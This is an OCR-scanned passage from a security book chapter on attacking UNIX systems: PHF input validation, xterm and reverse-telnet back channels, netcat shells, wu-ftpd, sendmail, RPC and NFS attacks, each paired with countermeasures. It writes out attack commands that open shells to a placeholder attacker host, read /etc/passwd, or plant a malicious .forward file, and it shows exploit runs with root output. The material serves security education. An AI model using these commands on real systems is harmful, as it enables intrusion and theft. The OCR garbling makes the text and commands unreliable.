See hffp:/ /www.obfuscafion.org/ipf/ipf-howfo.html for more information. 

Disable Stack Execution Some purists may frown on disabling stack execution in favor of 
ensuring each program is buffer-overflow free. It has few side effects, however, and pro- 
tects many systems from some carmed exploits. In Linux there is a no-stack execution 
patch available for the 2.0.x and 2.2.x series kernels. This patch can be found at 
http://www.openwall.com/linux/ and is primarily the work of the programmer 
extraordinaire. Solar Designer. 

For Solaris 2.6 and 7, we highly recommend enabling the "no-stack execution" set- 
tings. This will prevent many Solaris-related buffer overflows from working. Although 
the SPARC and Intel application binary interface (ABI) mandate that the stack has exe- 
cute permission, most programs can function correctly with stack execution disabled. By 
default, stack execution is enabled in Solaris 2.6 and 7. To disable stack execution, add the 
following entry to the /etc/system file: 

set noexec_user_stack=l 
set noexec_user_stack_log =1 

Keep in mind that disabling stack execution is not foolproof. Disabling slack execu- 
tion will normally log any program fhaf fries fo execufe code on fhe slack and fends fo 
fhwarf most script kiddies. However, experienced attackers are quite capable of writing 
(and disfribufing) code fhat exploits a buffer overflow condifion on a sysfem wifh slack 
execution disabled. 

While people go out of fheir way fo prevenf slack-based buffer overflows by dis- 
abling slack execution, other dangers lie in poorly written code. While not getting a lot of 
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attention, heap-based overflows are just as dangerous. Heap-based overflows are based 
on overrunning memory fhaf has been d 5 mamically allocafed by an application. This dif- 
fers from sfack-based overflows, which depend on overflowing a fixed-lengfh buffer. Un- 
forfunafely, vendors do nof have equivalenf "no heap execution" seffings. Thus, you 
should nof become lulled info a false sense of securify by jusf disabling slack execufion. 
While nof covered in defail here, more information on heap-based overflows can be 
found from fhe research fhe wOOwOO feam has performed af hffp:/ /www.wOOwOO.org/ 
f lies / heap! uf / heap! uf . f xf . 

Input Validation Attacks 



Popularity: 


8 


Simplicity: 


9 


Impact: 


8 


Risk Rating: 


9 



In 1996, Jermifer Myers identified and reporfed fhe infamous PHF vulnerabilify. Al- 
fhough fhis attack is rafher dafed, if provides an excellenf example of an inpuf validation 
attack. To reiferafe, if you undersfand how fhis attack works, your undersfanding can be 
applied fo many ofher attacks of fhe same genre even fhoughf if is an older attack. We will 
nof spend an inordinafe amounf of time on fhis subjecf, as if is covered in addifional defail 
in Chapfer 15. Our purpose is fo explain whaf an inpuf validafion attack is, and how if 
may allow attackers fo gain access fo a UNIX sysfem. 

An inpuf validafion attack occurs when 

T A program fails fo recognize S5mfacfically incorrecf inpuf. 

■ A module accepfs exfraneous inpuf. 

■ A module fails fo handle missing inpuf fields. 

A A field-value correlation error occurs. 

PHF is a Common Gafeway Inferface (CGI) scrip! fhaf came sfandard wifh early ver- 
sions of Apache web server and NGSA HTTPD. Unforfimafely, fhis program did nof 
properly parse and validafe fhe inpuf if received. The original version of fhe PHF scrip! 
accepfed fhe newline characfer (%0a) and execufed any subsequenf commands wifh fhe 
privileges of fhe user ID rurming fhe web server. The original PHF exploif was as follows: 

/cgi-bin/phf ?Qalias=x%0a/bin/cat%20/etc/passwd 

As if was wriffen, fhis exploif did nofhing more fhan cat fhe password file. Of course, 
fhis informafion could be used fo identify users' IDs as well as encr 5 q)fed passwords, as- 
suming fhe password files were nof shadowed. In mosf cases, an unskilled attacker 
would fry fo crack fhe password file and log in fo fhe vulnerable sysfem. A more sophisfi- 
cafed affacker could have gained direcf shell access fo fhe sysfem, as described lafer in 
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this chapter. Keep in mind that this vulnerability allowed attackers to execute any com- 
mands with the privileges of the user ID rurming the web server. In most cases, the user 
ID was "nobody," but there were many unfortimate sites that committed the cardinal sin 
of running fheir web server wifh roof privileges. 

PHF was a very popular attack in 1996 and 1997, and many sifes were compromised as 
a resulf of fhis simple buf effective exploif. If is imporfanf fo undersfand how fhe vulnera- 
bilify was exploifed so fhaf fhis concepf can be applied fo ofher rnpuf validation attacks, as 
fhere are dozens of fhese attacks in fhe wild. In UNIX, fhere are mefacharacfers fhaf are re- 
served for special purposes. These mefacharacfers include buf are nof limifed fo 

\ /<>!$% ^ & M ~ ; 

If a program or CGI scrip! were fo accepf user-supplied inpuf and nof properly vali- 
dafe fhis dafa, fhe program could be fricked info execufing arbifrary code. This is typi- 
cally referred fo as "escaping ouf" fo a shell and usually involves passing one of fhe UNIX 
mefacharacfers as user-supplied inpuf. This is a very common attack and by no means is 
limifed fo jusf PHF. There are many examples of insecure CGI programs fhaf were sup- 
plied as par! of a defaulf web server insfallafion. Worse, many vulnerable programs are 
written by web sife developers who have little experience in wrifing secure programs. 
Unforfunafely, fhese affacks will only continue fo proliferafe as e-commerce-enabled ap- 
plications provide additional functionality and increase their complexity. 

0 Input Validation Countermeasure 

As mentioned earlier, secure coding practices are one of fhe besf prevenfafive securify 
measures, and fhis concepf holds frue for inpuf validation affacks. If is absolufely crifical 
fo ensure fhaf programs and scripfs accepf only dafa fhey are supposed fo receive and 
fhaf fhey disregard everyfhing else. The WWW Securify FAQ is a wonderful resource fo 
help you keep your GGI programs secure and can be found af http: / / www.w3.org/ 
Securify/Faq/www-securify-faq.hfml. If's difficulf fo exclude every bad piece of dafa; 
inevifably, you will miss one crifical ifem. In addition, audif and fesf all code affer 
completion. 

1 Want My Shell 

Now fhaf we have discussed fhe fwo primary ways remofe attackers gain access fo a 
UNIX sysfem, we need fo describe several fechniques used fo obfain shell access. If is im- 
porfanf fo keep in mind fhaf a primary goal of any attacker is fo gain command-line or 
shell access fo fhe fargef sysfem. Tradifionally, inferacfive shell access is achieved by re- 
mofely logging in fo a UNIX server via telnet, rlogin, or ssh. Additionally, you can 
execufe commands via rsh, ssh, or rexec wifhouf having an inferacfive login. Af fhis 
poinf, you may be wondering whaf happens if remofe login services are fumed off or 
blocked by a firewall. How can attackers gain shell access fo fhe fargef sysfem? Good 
quesfion. Lef's creafe a scenario and explore multiple ways attackers can gain inferacfive 
shell access fo a UNIX sysfem. Figure 8-1 illusfrafes fhese mefhods. 
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Figure 8-1 . A simplistic DMZ architecture 



Suppose that attackers are trying to gain access to a UNIX-based web server that resides 
behind an indushial-based packet inspection firewall or router. The brand is not impor- 
tant — ^what is important is imderstanding that the firewall is a routing-based firewall and is 
not proxying any services. The only services that are allowed through the firewall are HTTP, 
port 80, and HTTP over SSL (HTTPS), port 443. Now assume that the web server is vulnera- 
ble to an input validation attack such as the PHF attack mentioned earlier. The web server is 
also running with the privileges of "nobody," which is common and is considered a good se- 
curity practice. If attackers can successfully exploit the PHF input validation condition, they 
can execute code on the web server as the user nobody. Executing commands on the target 
web server is critical, but it is only the first step in gaining interactive shell access. 




Operation X 
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Because the attackers are able to execute commands on the web server via the PHF at- 
tack, one of the first techniques to obtain interactive shell access is to take advantage of fhe 
UNIX X Window Sysfem. X is fhe windowing facilify fhaf allows many differenf programs 
fo share a graphical display. X is exfremely robusf and allows X-based clienf programs fo 
display fheir oufpuf fo fhe local X server or fo a remofe X server running on porfs 
6000-6063. One of fhe mosf useful X clienf s fo aff ackers is xterm. Xterm is used fo sfarf a 
local command shell when running X. However, by enabling fhe -di splay option, attack- 
ers can direcf a command shell fo fhe attackers' X server. Presto, insfanf shell access. 

Lef's fake a look af how attackers mighf exploif PHF fo do more fhan jusf display fhe 
confenfs of fhe pas swd file. Recall from earlier fhe original PHF exploif: 

/cgi-bin/phf ?Qalias=x%0a/bin/cat%20/etc/passwd 

Since attackers are able fo execute remofe commands on fhe web server, a slighfly 
modified version of fhis exploif will granf inferacfive shell access. All fhaf affackers 
need fo do is change fhe command fhaf is execufed from /bin/cat /etc/passwd fo 
/ usr/XllR6/bin/ xterm -ut -display evil_hackers_IP : 0 . 0 as follows: 

/cgi-bin/phf ?Qal ias=x%0a/usr /XI 1R6 /bin/ xterm%20-ut%20- 
display%2 Oevil_hackers_IP : 0 . 0 




The remofe web server will fhen execufe an xterm and display if back fo fhe 
evil_hacker's X server wifh a window ID of 0 and screen ID of 0. The affacker now has fo- 
fal confrol of fhe sysfem. Since fhe -ut opfion was enabled, fhis acfivify will nof be 
logged by fhe sysfem. Addifionally, fhe %2 0 is fhe hex equivalenf of a space characfer 
used fo denofe spaces between commands (man ascii for more informafion). Thus, fhe 
affackers were able fo gain inferacfive shell access wifhouf logging in fo any service on 
fhe web server. You will also notice fhe full pafh of fhe xterm binary was used. The full 
pafh is usually included because fhe PATH environmenf variable may nof be properly sef 
when fhe exploif is execufed. Using a fully qualified execution pafh ensures fhe web 
server will find fhe xterm binary. 

Reverse Telnet and Back Channels 
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xterm magic is a good sfarf for affackers, buf whaf happens when cagey admins re- 
move X from fheir sysfem? Removing X from a UNIX server can enhance fhe securify of a 
UNIX sysfem. However, fhere are always additional mefhods of gaining access fo fhe far- 
gef server, such as creating a back charmel. We define back channel as a mechanism where 
fhe communicafion charmel originafes from fhe fargef sysfem rather fhan from fhe attack- 
ing sysfem. Remember, in our scenario, affackers cannof obfain an inferacfive shell in fhe 



Hacking Exposed: Network Security Secrets and Solutions 



320 



traditional sense because all ports except 80 and 443 are blocked by the firewall. So, the at- 
tackers must originate a session from fhe vulnerable UNIX server fo fhe attackers' sysfem 
by creafing a back charmel. 

There are a few mefhods fhaf can be used fo accomplish fhis fask. In fhe firsf mefhod, 
reverse telnet, telnet is used fo creafe a back channel from fhe fargef sysfem fo fhe af- 
facker's sysfem. This fechnique is called a "reverse felnef" because fhe felnef connection 
originafes from fhe sysfem fo which fhe affackers are affempfing fo gain access insfead of 
originafing from fhe affacker's sysfem. A felnef clienf is f 5 q)ically insfalled on mosf UNIX 
servers, and ifs use is seldom resfricfed. Telnet is fhe perfecf choice for a back channel 
clienf if xterm is unavailable. To execufe a reverse felnef, we need fo enlisf fhe all-power- 
ful netcat or nc ufilify. Because we are felnefing from fhe fargef sysfem, we musf enable 
nc lisfeners on our own sysfem fhaf will accepf our reverse felnef connections. We musf 
execufe fhe following commands on our sysfem in two separafe windows fo successfully 
receive fhe reverse felnef connecfions: 

[tsunami]# nc -1 -n -v -p 80 

listening on [any] 80 

[tsunami]# nc -1 -n -v -p 25 

listening on [any] 25 

Ensure fhaf no listing services such as HTTPD or sendmai 1 are boimd fo porfs 80 or 25. 
If a service is already lisfenrng, if musf be killed via fhe kill command so fhaf n c can bind 
fo each respecfive porf. The two nc commands lisfen on porfs 25 and 80 via fhe -1 and -p 
swifches in verbose mode (-v), and do nof resolve IP addresses info hosfnames (-n). 

In line wifh our example, fo rnifiafe a reverse felnef, we musf execufe fhe following com- 
mands on the target server via the PHF exploit. Shown next is the actual command sequence: 

/bin/telnet evil_hackers_IP 80 | /bin/sh j /bin/telnet evil_hackers_IP 25 

This is the way it looks when executed via the PHF exploit: 

/cgi-bin/phf ?Qalias=x%0a/bin/telnet%2 0evil_hackers_IP 
%2080%20 I %20/bin/sh%20 | %20/bin/telnet%20evil_hackers_IP%2025 

Let's explain what this seemingly complex string of commands acfually does, 
/bin/telnet evil_hackers_IP 80 connecfs fo our nc lisfener on porf 80. This is 
where we acfually t 5 q)e our commands. In line wifh conventional UNIX inpuf/oufpuf 
mechanisms, our sfandard oufpuf or keysfrokes are piped info /bin/sh, fhe Bourne 
shell. Then fhe resulfs of our commands are piped info /bin/telnet evil_ 
hackers_IP 25. The resulf is a reverse felnef fhaf fakes place in fwo separafe windows. 
Porfs 80 and 25 were chosen because fhey are common services fhaf are fypically allowed 
oufbound by mosf firewalls. However, any fwo porfs could have been selecfed, as long as 
fhey were allowed oufbound by fhe firewall. 
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Another method of creating a back channel is to use nc rather than telnet if the nc 
binary already exists on the server or can be stored on the server via some mechanism (for 
example, anonymous FTP). As we have said many times, nc is one of fhe besf utilities 
available, so it is no surprise that it is now part of many defaulf freeware UNIX insfalls. 
Thus, fhe odds of finding nc on a fargef server are increasing. Alfhough nc may be on fhe 
fargef sysfem, there is no guarantee that it has been compiled with the # define 
GAPING_SECURITY_HOLE option that is needed to create a back channel via the -e 
switch. For our example, we will assume that a version of nc exisfs on fhe fargef server 
and has fhe aforemenfioned opfions enabled. 

Similar fo fhe reverse felnef mefhod outlined earlier, creating a back channel with nc 
is a two-step process. We must execute the following command fo successfully receive 
fhe reverse nc back channel. 

[tsunami]# nc -1 -n -v -p 80 

Once we have the listener enabled, we must execute the following command on the 
remote system: 

nc -e /bin/sh evil_hackers_IP 80 

This is the way it looks when executed via the PHF exploit: 

/cgi-bin/phf ?Qaiias=x%0a/bin/nc%20-e%20/bin/ sh%20evil_hackers_IP%2080 

Once the web server executes the preceding string, an nc back channel will be created 
that "shovels" a shell, in this case /bin/sh, back to our listener. Instant shell access — all 
with a connection that was originated via the target server. 

Q Back Channel Countermeasure 

It is very difficult to protect against back channel attacks. The best prevention is to keep 
your systems secure so that a back channel attack cannot be executed. This includes dis- 
abling unnecessary services and applying vendor patches and related work-arounds as 
soon as possible. 

Other items that should be considered include the following: 

T Remove X from any sysfem fhaf requires a high level of securify. Not only will 
this prevent attackers from firing back an xterm, buf if will also aid in 
preventing local users in escalating their privileges to root via vulnerabilities in 
the X binaries. 

■ If fhe web server is running with the privileges of nobody, adjusf fhe 
permissions of your binary files such as telnet fo disallow execufion by 
everyone excepf fhe owner of the binary and specific groups (for example, 
chmod 750 telnet). This will allow legitimafe users fo execute telnet, but 
will prohibit user IDs that should never need to execute telnet from doing so. 
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A In some instances, it may be possible to configure a firewall fo prohibif 
cormecfions fhaf originafe from web server or infernal sysfems. This is 
parficularly frue if fhe firewall is proxy based. If would be difficulf, buf nof 
impossible, fo launch a back charmel fhrough a proxy-based firewall fhaf 
requires some sorf of aufhenficafion. 



Common Types of Remote Attacks 

While we can'f cover every conceivable remofe attack, by now you should have a solid 
undersfanding of how mosf remofe attacks occur. Addifionally, we wanf fo cover some 
major services fhaf are frequenfly attacked, and fo provide counfermeasures fo help re- 
duce fhe risk of exploifafion if fhese servers are enabled. 




TFP 



Popularity: 


8 


Simplicity: 


1 


Impact: 


3 


Risk Rating: 


4 



TFTP, or Trivial File Transfer Protocol, is f 5 q)ically used fo hoof diskless worksfafions 
or network devices such as routers. TFTP is a UDP-based protocol fhaf listens on porf 69 
and provides very little securify. Many times attackers will locate a sysfem wifh a TFTP 
server enabled and affempf fo TFTP a copy of fhe / etc/passwd file back fo fheir sysfem. 
If fhe TFTP server is configured incorrecfly, fhe fargef sysfem will happily give up fhe 
/etc/passwd file. The attackers now have a lisf of usernames fhaf can be brute forced. If 
fhe password file wasn'f shadowed, fhe affackers have fhe usernames and encr}q)fed 
passwords fhaf may allow fhe affackers fo crack or guess user passwords. 

Many newer versions of TFTP are configured by defaulf fo prohibif access fo any di- 
rectory excepf /tftpboot. This a good step, buf if is still possible for affackers fo pull 
back any file in fhe /tftpboot directory. This includes pulling back sensifive roufer 
configuration files by guessing fhe roufer configurafion filename, which is usually 
<hostname of the router>. cfg. In many cases, fhe infruder would gain access fo fhe roufer 
passwords and SNMP communify sfrings. We have seen entire networks compromised 
in fhe span of hours jusf by TFTPing roufer configurafion files from an insecure TFTP 
server. The configurafion files were used fo recover roufer passwords and SNMP com- 
munify sfrings fhaf happened fo be idenfical for every device on fhe network. 

Q TFTP Countermeasure 

Ensure that the TFTP server is configured fo resfricf access fo specific direcfories such as 
/tftpboot. This will prevenf affackers from frying f o pull back sensifive sysfem-conf ig- 
urafion files. Addifionally, consider implemenfing network- and host-based access-con- 
trol mechanisms to prevent unauthorized systems from accessing the TFTP server. 
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FTP 
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FTP, or File Transfer Protocol, is one of the most common protocols used today. It al- 
lows you to upload and download files from remote systems. FTP is often abused to gain 
access to remote systems or to store illegal files. Many FTP servers allow anonymous ac- 
cess, enabling any user to log in to the FTP server without authentication. Typically the 
file system is restricted to a particular branch in the directory tree. On occasion, however, 
an anonymous FTP server will allow the user to traverse the entire directory structure. 
Thus, attackers can begin to pull down sensitive configuration files such as 
/etc/passwd. To compound this situation, many FTP servers have world-writable di- 
rectories. A world-writable directory combined with anonymous access is a security inci- 
dent waiting to happen. Attackers may be able to place an . rhost s file in a user's home 
directory, allowing the attackers to rlogin to the target system. Many FTP servers are 
abused by software pirates who store illegal booty in hidden directories. If your network 
utilization triples in a day, it might be a good indication that your systems are being used 
for moving the latest "warez." 

In addition to the risks associated with allowing anonymous access, FTP servers have 
had their fair share of security problems related to buffer overflow conditions and other 
insecurities. One of the latest FTP vulnerabilities has been discovered in systems running 
wu-ftpd 2.6.0 and earlier versions (ftp://ftp.auscert.org.au/pub/auscert/advisory/ 
AA-2000.02). The wu-ftpd "site exec" vulnerability is related to improper validation of 
arguments in several function calls that implement the "site exec" functionality. The "site 
exe" functionality enables users logged in to an FTP server to execute a restricted set of 
commands. However, it is possible for an attacker to pass special characters consisting of 
carefully constructed pr int f ( ) conversion characters (%f, %p, %n, and so on) to execute 
arbitrary code as root. Let's take a look at this attack launched against a stock RedHat 6.2 
system. 

[thunder]# wugod -t 192.168.1.10 -sO 

Target: 192.168.1.10 (ftp/<shellcode>) : RedHat 6.2 (?) with wuftpd 
2 . 6 . 0 ( 1 ) from rpm 

Return Address: 0x08075844, AddrRetAddr : 0xbfffb028, Shellcode: 152 
loggin into system.. 

USER ftp 

331 Guest login ok, send your complete e-mail address as password. 

PASS <shellcode> 

230-Next time please use your e-mail address as your password 

230- for example: joeOthunder 

230 Guest login ok, access restrictions apply. 
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STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04] 

STEP 3 : Checking if we can reach our return address by format string 
STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 me now) 

STEP 5 : Sending code., this will take about 10 seconds. 

Press ''X to leave shell 

Linux shadow 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 1686 unknown 
uid=0 (root) gid=0 (root) egid=50 (ftp) groups=50 (ftp) 

As demonstrated earlier, this attack is extremely deadly. Anonymous access to a vulnera- 
ble FTP server that supports "site exec" is enough to gain root access. 

Other security flaws with BSD-derived ftpd versions dating back to 1993 can be 
found at http:/ /www.cert.org/advisories/CA-2000-13.html. These vulnerabilities are 
not discussed in detail here, but are just as deadly. 

Q FTP Countermeasure 

Although FTP is very useful, allowing anonymous FTP access can be hazardous to your 
server's health. Evaluate the need to run an FTP server and certainly decide if anonymous 
FTP access is allowed. Many sites must allow anonymous access via FTP; however, give 
special consideration to ensuring the security of the server. It is critical that you make 
sure the latest vendor patches are applied to the server, and you eliminate or reduce the 
number of world-writable directories in use. 
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Where to start? Sendmail is a mail transfer agenf (MTA) thaf is used on many UNIX 
sysfems. Sendmail is one of fhe most maligned programs in use. It is extensible, highly 
configurable, and definifely complex. In fact, sendmail's woes started as far back as 
1988 and were used fo gain access fo fhousands of systems. The miming joke at one time 
was "what is the sendmail bug of the week?" Sendmail and its related security have 
improved vastly over the past few years, but it is still a massive program with over 80,000 
lines of code. Thus, fhe odds of finding additional security vulnerabilities are still good. 

Recall from Chapfer 3, sendmail can be used fo identify user accounfs via the vrf y 
and expn commands. User enumeration is dangerous enough, but doesn't expose the 
true danger that you face when running sendmail. There have been scores ofsendmail 
securify vulnerabilities discovered over the last ten years, and there are more to come. 
Many vulnerabilities related to remote buffer overflow conditions and input validation 
attacks have been identified. One of fhe mosf popular sendmail attacks was the 
sendmail pipe vulnerability that was present in sendmail 4.1. This vulnerability al- 
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lowed attackers to pipe commands directly to sendmail for execution. Any command 
after the data would be executed by sendmail with the privileges of bin: 



helo 

mail from: | 

rcpt to : bounce 
data 

mail from: bin 

rcpt to: I sed 'l,/^$/d' 

data 



sh 



Aside from fhe common buffer overflow and inpuf validation attacks, it is quite pos- 
sible to exploit sendmai I's functionality to gain privileged access. A common attack is to 
create or modify a user's ~ / . forwardviaFTPorNFS,assumingfheaffackershavewrife 
privileges fo fhe vicfim's home direcfory. A ~ / . forward file f5q)ically forwards mail fo a 
differenf accounf or runs some program when mail arrives. Obviously, attackers can 
modify fhe -/ . forward file for nefarious purposes. Lef's fake a look af an example of 
whaf attackers mighf add fo a -/ . forward file on fhe vicfim's sysfem: 

[tsunami] $ cat > .forward 

I "cp /bin/sh /home/gk/evil_shell ; chmod 755 /home/gk/evil_shell" 

<crtl> D 

[tsunami] $ cat .forward 

I "cp /bin/sh /home/gk/evil_shell ; chmod 755 /home/gk/evil_shell " 

After fhis file is creafed, attackers will move fhe evil ~ / . forward file fo fhe fargef 
sysfem, assuming fhaf a user's home direcfory is wrifable. Nexf, fhe affackers will send 
mail fo fhe vicfim accounf: 



[tsunami] $ echo hello chump | mail gk0targetsystem.com 

The file evi l_she 1 1 will be creafed in fhe user's home direcfory. When execufed, if 
will spawn a shell wifh fhe same privileges as fhe vicfim user's ID. 

Q Sendmail Countermeasure 

The besf defense for sendmail attacks is fo disable sendmail if you are nof using if fo 
receive mail over a network. If you musf run sendmail, ensure fhaf you are using fhe laf- 
esf version wifh all relevanf securify pafches (see www.sendmail.org). Ofher measures 
include removing fhe decode aliases from fhe alias file, as fhis has proven fo be a securify 
hole. Investigafe every alias fhaf poinfs fo a program rafher fhan fo a user accounf, and 
ensure fhaf fhe file permissions of fhe aliases and ofher relafed files do nof allow users fo 
make changes. 

There are additional utilities fhaf can be used fo augmenf fhe securify of sendmail. 
Smap and smapd are bundled wifh fhe TIS foolkif and are freely available from 
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http: / / WWW. tis.com /research/ software/. Smap is used to accept messages over the net- 
work in a secure fashion and queues fhem in a special direcfory. Smapd periodically 
scans fhis direcfory and delivers fhe mail fo fhe respective user by using sendmail or 
some ofher program. This effectively breaks fhe cormecfion befween sendmail and 
unfrusfed users, as all mail connections are received via smap, rafher fhan direcfly by 
sendmail. Finally, consider using a more secure MTA such as qmail. Qmail is a mod- 
em replacemenf for sendmail, written by Dan Bernsfein. One of ifs main goals is secu- 
rify, and if has had a solid repufafion fhus far (see www.qmail.org). 

In addition fo fhe aforementioned issues, sendmail is often misconfigured, allowing 
spammers fo relay junk mail fhrough your sendmail. As of sendmail version 8.9 and 
higher, anti-relay functionalify has been enabled by defaulf . See http: / / www.sendmail.org/ 
fips/relaying.hfml for more information on keeping your sife ouf of fhe hands of spammers. 



Remote Procedure Call Services 
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Remofe Procedure Call (RPC) is a mechanism fhaf allows a program running on one 
compufer fo seamlessly execufe code on a remofe sysfem. One of fhe firsf RPC implemen- 
fafions was developed by Sun Microsysfems and used a sysfem called exfernal dafa rep- 
resenfafion (XDR). The implemenfafion was designed fo inferoperafe wifh Sun's 
Nefwork Informafion Sysfem (NIS) and Nefwork File Sysfem (NFS). Since Sun 
Microsysfem's developmenf of RPC services, many ofher UNIX vendors have adopfed if. 
Adoption of an RPC sfandard is a good fhing from an inferoperabilify sfandpoinf. How- 
ever, when RPC services were firsf infroduced, fhere was very liffle securify builf in. 
Thus, Sun and ofher vendors have fried fo pafch fhe exisfing legacy framework fo make if 
more secure, buf if still suffers from a myriad of securify -relafed problems. 

As discussed in Chapfer 3, RPC services regisfer wifh fhe porfmapper when sfarfed. 
To confacf an RPC service, you musf query fhe porfmapper fo defermine which porf fhe 
required RPC service is lisfening on. We also discussed how fo obfain a lisfing of running 
RPC services by using rpcinfo or by using fhe -n option if fhe porfmapper services 
were firewalled. Unfortunafely, numerous sfock versions of UNIX have many RPC ser- 
vices enabled upon boofup. To exacerbafe matters, many of fhe RPC services are ex- 
tremely complex and run wifh roof privileges. Thus, a successful buffer overflow or inpuf 
validation attack will lead fo direcf roof access. The currenf rage in remofe RPC buffer 
overflow attacks relafes fo rpc . ttdbserverd (http://www.cerf.org/advisories/ 
CA-98.11.foolfalk.hfml) and rpc.cmsd (hffp://www. cerf.org/advisories/ 
CA-99-08-cmsd.hfml), which are parf of fhe common desktop environmenf (CDF). Be- 
cause fhese fwo services run wifh roof privileges, attackers only need fo successfully ex- 
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ploit the buffer overflow condition and send back an xterm or a reverse felnef and fhe 
game is over. Ofher dangerous RPC services include rpc . statd (hffp:/ /www.cerf.org/ 
advisories/CA-99-05-sfafd-aufomounfd.hfml) and mount d, which are active when NFS 
is enabled (see fhe section "NFS" ) . Even if fhe porfmapper is blocked, fhe aff acker may be 
able fo manually scan for fhe RPC services (via fhe -sR opfion of nmap), which f 5 ^ically 
run af a high-numbered porf. The aforemenfioned services are only a few examples of 
problematic RPC services. Due fo RPC's disfribufed nafure and complexify, if is ripe for 
abuse, as shown nexf. 

[rumble]# cmsd.sh quake 192.168.1.11 2 192.168.1.103 

Executing exploit. . . 

rtable_create worked 

clnt_call [ rtable_insert ] : RPC: Unable to receive; errno = Connection reset 
by peer 

A simple shell scrip! fhaf calls fhe cmsd exploif simplifies fhis attack and is shown 
nexf. If is necessary fo know fhe sysfem name; in our example fhe sysfem is named quake. 
We provide fhe fargef IP address of quake, which is 192.168.1.11. We provide fhe sysfem 
fype (2), which equafes fo Solaris 2.6. This is crifical, as fhe exploif is failored fo each oper- 
ating sysfem. Finally, we provide fhe IP address of fhe attackers' sysfem (192.168.1.103) 
and send back fhe xterm (see Figure 8-2). 

# ! /bin/ sh 

if [ $# -it 4 ] ; then 

echo "Rpc. cmsd buffer overflow for Solaris 2.5 & 2.6 7" 
echo "If rpcinfo -p target_ip I grep 100068 = true - you win!" 
echo "Don't forget to xhost+ the target system" 
echo "" 

echo "Usage: $0 target_hostname target_ip <0/S version (1-7) > your_ip" 
exit 1 
fi 

echo "Executing exploit..." 

cmsd -h $1 -c " /usr /openwin/bin/xterm -display $4:0.0 &" $3 $2 

Q Remote Procedure Call Services Countermeasure 

The besf defense agarnsf remofe RPC affacks is fo disable any RPC service fhaf is nof ab- 
solufely necessary. If an RPC service is crifical fo fhe operafion of fhe server, consider 
implemenfing an access confrol device fhaf only allows aufhorized sysfems fo confacf 
fhose RPC porfs, which may be very difficulf depending on your environmenf. Con- 
sider enabling a non-execufable slack if if is supporfed by your operafing sysfem. Also, 
consider using Secure RPC if if is supporfed by your version of UNIX. Secure RPC af- 
fempfs fo provide an addifional level of aufhenficafion based upon public key cr}q)fog- 
raphy. Secure RPC is nof a panacea, as many UNIX vendors have nof adopfed fhis 
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protocol. Thus, interoperability is a big issue. Finally, ensure that all the latest vendor 
patches have been applied. 

NFS 



Popularity: 


8 


Simplicity: 


9 


Impact: 


8 


Risk Rating: 


8 



To quote Sun Microsystems, "the network is the computer." Without a network, a 
computer's utility diminishes greatly. Perhaps that is why the Network File System 
(NFS) is one of the most popular network-capable file sysfems available. NFS allows 
fransparenf access fo files and directories of remofe sysfems as if fhey were sfored locally. 
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NFS versions 1 and 2 were originally developed by Sun Microsystems and have evolved 
considerably. Currently, NFS version 3 is employed by most modern flavors of UNIX. Af 
fhis poinf, fhe red flags should be going up for any sysfem fhaf allows remofe access of an 
exporfed file sysfem. The pofenfial for abusing NFS is high and is one of fhe more com- 
mon UNIX attacks. Many buffer overflow conditions relafed fo mount d, fhe NFS server, 
have been discovered. Addifionally, NFS relies on RPC services and can be easily fooled 
info allowing attackers fo mounf a remofe file sysfem. Mosf of fhe securify provided by 
NFS relafes fo a dafa objecf known as a file handle. The file handle is a foken fhaf is used fo 
uniquely identify each file and directory on fhe remofe server. If a file handle can be 
sniffed or guessed, remofe affackers could easily access fhose files on fhe remofe sysfem. 

The mosf common f 5 q>e of NFS vulnerabilify relafes fo a misconfigurafion fhaf ex- 
porfs fhe file sysfem fo everyone. Thaf is, any remofe user can mounf fhe file sysfem wifh- 
ouf aufhenficafion. This type of vulnerabilify is generally a resulf of laziness or ignorance 
on fhe parf of fhe adminisfrafor and is exfremely common. Affackers don'f need fo acfu- 
ally break info a remofe sysfem — all fhaf is necessary is fo mounf a file sysfem via NFS 
and pillage any files of inferesf. T 5 q)ically, users' home directories are exporfed fo fhe 
world, and mosf of fhe interesting files (for example, entire dafabases) are accessible re- 
mofely. Even worse, fhe entire "/" directory is exporfed fo everyone. Lef's fake a took af 
an example and discuss some fools fhaf make NFS probing more useful. 

Lef's examine our fargef sysfem fo defermine if if is rurming NFS and whaf file sys- 



ferns are exporfed, if any. 
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By querying the portmapper, we can see that mount d and the NFS server are run- 
ning, which indicates that the target systems may be exporting one or more file systems. 

[tsunami]# showmount -e quake 

Export list for quake: 

/ (everyone) 

/usr (everyone) 

The results of showmount indicafe thaf fhe entire / and /usr file sysfems are ex- 
porfed fo fhe world, which is a huge security risk. All attackers would have to do is 
mount / or / usr, and they would have access to the entire / and /usr file sysfem, sub- 
jecf fo the permissions on each file and direcfory. Mount is available in mosf flavors of 
UNIX, buf if is nof as flexible as some other tools. To learn more about UNIX's mount 
command, you can run man mount to pull up the manual for your particular version, as 
fhe S5mtax may differ: 



Chapter 8: Hacking UNIX 



331 



[tsunami]# mount quake:/ /mnt 

A more useful tool for NFS exploration is nfsshell by Leendert van Doom, which is 
available from ftp://ftp.cs.vu.nl/pub/leendert/nfsshell.tar.gz. The nfsshell package 
provides a robust client called nf s. Nf s operates like an FTP client and allows easy ma- 
nipulation of a remote file system. Nf s has many options worth exploring. 

[tsunami] # nfs 
nfs> help 

host <host> - set remote host name 

uid [<uid> [<secret-key>] ] - set remote user id 

gid [<gid>] - set remote group id 

cd [<path>] - change remote working directory 

led [<path>] - change local working directory 

cat <filespec> - display remote file 

Is [-1] <filespec> - list remote directory 

get <filespec> - get remote files 

df - file system information 

rm <file> - delete remote file 

In <filel> <file2> - link file 

mv <filel> <file2> - move file 

mkdir <dir> - make remote directory 

rmdir <dir> - remove remote directory 

chmod <mode> <file> - change mode 

chown <uid> [ . <gid>] <file> - change owner 

put <local-file> [ <remote-f ile> ] - put file 

mount [-upTU] [-P port] <path> - mount file system 

umount - umount remote file system 

umountall - umount all remote file systems 

export - show all exported file systems 

dump - show all remote mounted file systems 

status - general status report 

help - this help message 

quit - its all in the name 

bye - good bye 

handle [<handle>] - get/set directory file handle 
mknod <name> [b/c major minor] [p] - make device 

We must first tell nfs what host we are interested in mounting: 

nfs> host quake 

Using a privileged port (1022) 

Open quake (192.168.1.10) TCP 
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Let's list the file systems that are exported: 

nfs> export 

Export list for quake: 

/ everyone 
/usr everyone 

Now we must mount / to access this file sysfem: 

nfs> mount / 

